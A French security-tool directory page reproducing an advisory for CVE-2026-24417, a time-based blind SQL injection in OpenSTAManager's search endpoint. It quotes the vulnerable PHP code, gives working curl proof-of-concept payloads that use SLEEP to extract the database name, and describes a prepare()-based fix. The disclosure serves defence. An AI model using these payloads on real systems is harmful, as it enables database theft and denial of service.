Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-24417 — CVE-2026-24417 - OpenSTAManager présente une injection SQL aveugle basée sur le temps avec un déni de service amplifié. | Kitploit
Outils/GitHubGitHub/lukasz-rybak/cve-2026-24417
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationSécurité des Bases de Données
GitHublukasz-rybak/cve-2026-24417

CVE-2026-24417

CVE-2026-24417 - OpenSTAManager présente une injection SQL aveugle basée sur le temps avec un déni de service amplifié.

Voir le dépôt
4il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-24417 : OpenSTAManager présente une injection SQL aveugle basée sur le temps avec déni de service amplifié

Aperçu

ChampDétails
ID CVECVE-2026-24417
SévéritéHIGH
Avis de sécuritéVoir l'avis
Découvert parLukasz Rybak

Produits concernés

  • devcode-it/openstamanager (versions : < 2.9.8)

Classification CWE

  • CWE-89 : Neutralisation incorrecte des éléments spéciaux utilisés dans une commande SQL (« Injection SQL »)

Détails

Résumé

Une vulnérabilité critique d'injection SQL aveugle basée sur le temps affectant plusieurs modules de recherche dans OpenSTAManager v2.9.8 permet à des attaquants authentifiés d'extraire le contenu sensible de la base de données, notamment les empreintes de mots de passe, les données clients et les enregistrements financiers, par des attaques d'inférence booléenne basées sur le temps avec exécution amplifiée sur plus de 10 modules.

Statut : ✅ Confirmé et testé sur une instance en direct (v2.9.8) Paramètre vulnérable : term (GET) Point de terminaison affecté : /ajax_search.php Modules affectés : Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi

Détails

OpenSTAManager v2.9.8 contient une vulnérabilité critique d'injection SQL aveugle basée sur le temps dans la fonctionnalité de recherche globale. L'application ne parvient pas à nettoyer correctement le paramètre term avant de l'utiliser dans des clauses SQL LIKE au sein de plusieurs gestionnaires de recherche spécifiques aux modules, permettant aux attaquants d'injecter des commandes SQL arbitraires et d'extraire des données sensibles par inférence booléenne basée sur le temps.

Chaîne de vulnérabilité :

  1. Point d'entrée : /ajax_search.php (Lignes 30-31)

    root@kitploit:~
    $term = get('term');
    $term = str_replace('/', '\\/', $term);
    

    Le paramètre $term subit un nettoyage minimal (uniquement le remplacement des barres obliques).

  2. Distribution : /src/AJAX.php::search() (Lignes 159-161)

    root@kitploit:~
    $files = self::find('ajax/search.php');
    array_unshift($files, base_dir().'/ajax_search.php');
    foreach ($files as $file) {
        $module_results = self::getSearchResults($file, $term);
    

    Le $term non nettoyé est transmis à tous les gestionnaires de recherche spécifiques aux modules.

  3. Exécution : /src/AJAX.php::getSearchResults() (Ligne 373)

    root@kitploit:~
    require $file;
    

    Le fichier search.php de chaque module est inclus avec la variable $term dans la portée.

  4. Requêtes SQL vulnérables : Plusieurs modules concatènent directement $term sans prepare()

Tous les fichiers affectés (10+ instances vulnérables) :

  1. /modules/articoli/ajax/search.php - Ligne 51 (EXEMPLE PRINCIPAL)

    root@kitploit:~
    foreach ($fields as $name => $value) {
        $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    }
    $rs = $dbo->fetchArray($query);
    

    Impact : Concaténation directe sans prepare(), permettant une injection SQL complète.

  2. /modules/ordini/ajax/search.php - Lignes 43, 47

    root@kitploit:~
    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    $query .= '... WHERE `mg_articoli`.`codice` LIKE "%'.$term.'%" OR `mg_articoli_lang`.`title` LIKE "%'.$term.'%"';
    
  3. /modules/ddt/ajax/search.php - Lignes 43, 47

    root@kitploit:~
    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    
  4. /modules/fatture/ajax/search.php - Lignes 45, 49

    root@kitploit:~
    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    
  5. /modules/preventivi/ajax/search.php - Lignes 45, 49

    root@kitploit:~
    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    
  6. /modules/anagrafiche/ajax/search.php - Lignes 62, 107, 162

    root@kitploit:~
    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    
  7. /modules/impianti/ajax/search.php - Ligne 46

    root@kitploit:~
    $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
    

Correctement nettoyés (NON vulnérables) :

  • /modules/contratti/ajax/search.php - Utilise prepare() correctement
  • /modules/automezzi/ajax/search.php - Utilise prepare() correctement

Remarque : La vulnérabilité a une exécution amplifiée : une seule requête malveillante déclenche une injection SQL sur TOUS les modules vulnérables simultanément, ce qui fait que les attaques basées sur le temps s'exécutent 10 fois ou plus par requête, multipliant le délai et conduisant à des erreurs 504 Gateway Time-out, comme observé sur l'instance de démonstration en direct.

image

PoC

Étape 1 : Connexion

root@kitploit:~
curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

Étape 2 : Vérification de la vulnérabilité (SLEEP basé sur le temps)

root@kitploit:~
# Test with SLEEP(1) - should take ~85+ seconds due to amplified execution
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22'
# Result: real 72.29s

# Test with SLEEP(0) - should be fast
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(0)%20OR%20%22'
# Result: real 0.30s
image

Étape 3 : Extraction de données - Nom de la base de données

root@kitploit:~
# Extract first character of database name (expected: 'o' from 'openstamanager')
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 170.32s

# Test with wrong character 'x' - should be fast
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 0m0.30s
image

Impact

Utilisateurs concernés : Tous les utilisateurs authentifiés ayant accès à la fonctionnalité de recherche globale.

  • Exfiltration complète de la base de données, y compris les données personnelles des clients, les enregistrements financiers et les secrets commerciaux
  • Extraction des empreintes de mots de passe pour cassage hors ligne
  • Les attaques basées sur le temps amplifiées consomment 85 fois les ressources serveur par requête

Correctif recommandé :

Remplacez toutes les instances de concaténation directe de $term par prepare() :

AVANT (Vulnérable) :

root@kitploit:~
$query .= ' OR '.$value.' LIKE "%'.$term.'%"';

APRÈS (Corrigé) :

root@kitploit:~
$query .= ' OR '.$value.' LIKE '.prepare('%'.$term.'%');

Appliquez ce correctif à TOUS les fichiers affectés :

  1. /modules/articoli/ajax/search.php - Ligne 51
  2. /modules/ordini/ajax/search.php - Lignes 43, 47, 79
  3. /modules/ddt/ajax/search.php - Lignes 43, 47, 83
  4. /modules/fatture/ajax/search.php - Lignes 45, 49, 85
  5. /modules/preventivi/ajax/search.php - Lignes 45, 49, 83
  6. /modules/anagrafiche/ajax/search.php - Lignes 62, 107, 162
  7. /modules/impianti/ajax/search.php - Ligne 46

Références

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4hc4-8599-xh2h
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24417
  • https://github.com/advisories/GHSA-4hc4-8599-xh2h

Avertissement

Cette CVE a été divulguée de manière responsable, conformément aux pratiques de divulgation coordonnée des vulnérabilités. Les informations fournies ici le sont uniquement à des fins éducatives et défensives.

Télécharger l’outil